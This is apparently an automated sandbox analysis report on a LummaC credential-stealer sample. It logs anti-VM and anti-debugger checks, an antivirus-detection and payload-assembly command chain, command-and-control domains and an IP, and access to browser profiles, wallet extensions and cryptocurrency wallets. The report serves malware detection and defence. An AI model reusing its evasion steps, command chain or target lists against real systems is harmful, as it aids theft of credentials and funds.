Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0055E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	14_2_0055E472
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0056A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	14_2_0056A570
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0052C622 FindFirstFileExW,	14_2_0052C622
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_005666DC FindFirstFileW,FindNextFileW,FindClose,	14_2_005666DC
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00567333 FindFirstFileW,FindClose,	14_2_00567333
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_005673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	14_2_005673D4
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0055D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_0055D921

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004F5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

14_2_004F5FC8

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400\	Jump to behavior

Source: CLaYpUL3zw.exe, CLaYpUL3zw.exe, 00000000.00000002.2258610210.0000000000EE7000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Climb.com, 0000000E.00000002.3470289773.0000000001BBD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: Climb.com, 0000000E.00000003.2536912337.00000000044D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Set-up.exe, Climb.com, 0000000E.00000003.3296131318.000000000457B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.3296354162.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.3296328079.000000000457B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CLaYpUL3zw.exe, CLaYpUL3zw.exe, 00000000.00000002.2251469203.00000000005D2000.00000040.00000001.01000000.00000003.sdmp, CLaYpUL3zw.exe, 00000000.00000003.2210580420.0000000005560000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DetectVirtualMachine
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000003.00000003.2264873236.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Set-up.exe, 00000003.00000003.2496527843.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496126173.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496722730.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2497124911.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2495746177.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2498542367.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Set-up.exe.0.dr	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: CLaYpUL3zw.exe, 00000000.00000002.2260643842.00000000016FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: CLaYpUL3zw.exe, 00000000.00000003.2210580420.0000000005560000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Climb.com, 0000000E.00000003.2536912337.00000000044D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: CLaYpUL3zw.exe, 00000000.00000002.2251469203.00000000005D2000.00000040.00000001.01000000.00000003.sdmp, CLaYpUL3zw.exe, 00000000.00000003.2210580420.0000000005560000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: <Module>laddad.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeladdadEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksin1jhvfotsq.resources
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: CLaYpUL3zw.exe, 00000000.00000002.2258610210.0000000000EE7000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	File opened: NTICE
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	File opened: SICE
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_0056F4FF BlockInput,

14_2_0056F4FF

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004F338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

14_2_004F338B

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

2_2_00406328

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00515058 mov eax, dword ptr fs:[00000030h]

14_2_00515058

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_005520AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

14_2_005520AA

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00522992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00522992
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00510BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00510BAF
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00510D45 SetUnhandledExceptionFilter,	14_2_00510D45
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00510F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00510F91

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Climb.com, 0000000E.00000003.2456084330.0000000004554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: prisonyfork.buzz
Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hummskitnj.buzz
Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cashfuzysao.buzz
Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: appliacnesot.buzz
Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: screwamusresz.buzz
Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: inherineau.buzz
Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: scentniej.buzz
Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rebuildeso.buzz
Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: spuriotis.click

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

14_2_00551B4D

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004F338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

14_2_004F338B

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_0055BBED SendInput,keybd_event,

14_2_0055BBED

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_0055EC6C mouse_event,

14_2_0055EC6C

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_005514AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

14_2_005514AE

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00551FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

14_2_00551FB0

Source: Climb.com, 0000000E.00000000.2308179034.00000000005B3000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000E.00000003.2460332709.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Alt.11.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Climb.com	Binary or memory string: Shell_TrayWnd
Source: CLaYpUL3zw.exe, CLaYpUL3zw.exe, 00000000.00000002.2258610210.0000000000EE7000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ^(Program Manager

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00510A08 cpuid

14_2_00510A08

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_0054E5F4 GetLocalTime,

14_2_0054E5F4

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_0054E652 GetUserNameW,

14_2_0054E652

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_0052BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

14_2_0052BCD2

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

2_2_00406831

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: procmon.exe
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: wireshark.exe

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Climb.com PID: 5660, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: :"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Ve
Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152>u
Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152>u
Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152>u
Source: Climb.com, 0000000E.00000003.3296131318.000000000457B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152>u

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.5:49762 -> 194.87.58.92:80

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
